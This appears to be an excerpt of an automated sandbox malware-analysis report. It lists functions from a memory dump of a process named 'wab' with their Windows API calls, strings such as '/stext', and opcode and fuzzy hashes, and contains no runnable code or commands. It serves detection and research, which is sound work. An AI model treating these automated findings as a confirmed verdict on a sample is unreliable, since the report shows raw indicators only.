                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: d
                                                                                                                                                                                                                    • API String ID: 0-2564639436
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                                                    • String ID: BINARY
                                                                                                                                                                                                                    • API String ID: 2221118986-907554435
                                                                                                                                                                                                                    • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                                                                                                    • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                                                                                                                      • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(?), ref: 00410654
                                                                                                                                                                                                                      • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                                                      • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                                                                                                                                      • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                                                                                                      • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1161345128-0
                                                                                                                                                                                                                    • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                                                                                                    • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _wcsicmp
                                                                                                                                                                                                                    • String ID: /stext
                                                                                                                                                                                                                    • API String ID: 2081463915-3817206916
                                                                                                                                                                                                                    • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                                                                                    • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _wcsicmp
                                                                                                                                                                                                                    • String ID: .Ww
                                                                                                                                                                                                                    • API String ID: 2081463915-571950480
                                                                                                                                                                                                                    • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                                                                                                    • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                      • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                                                                                                                      • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                                                      • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 159017214-0
                                                                                                                                                                                                                    • Opcode ID: ce19115a923a15add3814b7342b05fb50f984b43095f56e0ebc72410723b566f
                                                                                                                                                                                                                    • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce19115a923a15add3814b7342b05fb50f984b43095f56e0ebc72410723b566f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3150196962-0
                                                                                                                                                                                                                    • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                                                                                                                                                    • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: malloc
                                                                                                                                                                                                                    • String ID: failed to allocate %u bytes of memory
                                                                                                                                                                                                                    • API String ID: 2803490479-1168259600
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcmpmemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1065087418-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 00406E09
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 00406E5A
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$??2@
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3700833809-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2221118986-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1297977491-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                                                                                                                      • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                                                      • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                                                      • Part of subcall function 0040A02C: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                                                                                    • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$Time$ChangeCloseCompareCreateFindNotificationmemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1481295809-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3150196962-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$PointerRead
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3154509469-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                                                                                                                      • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                                                                                                                      • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                                                                                                                      • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4232544981-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                                                                    • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$FileModuleName
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3859505661-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileRead
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileWrite
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3934441357-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
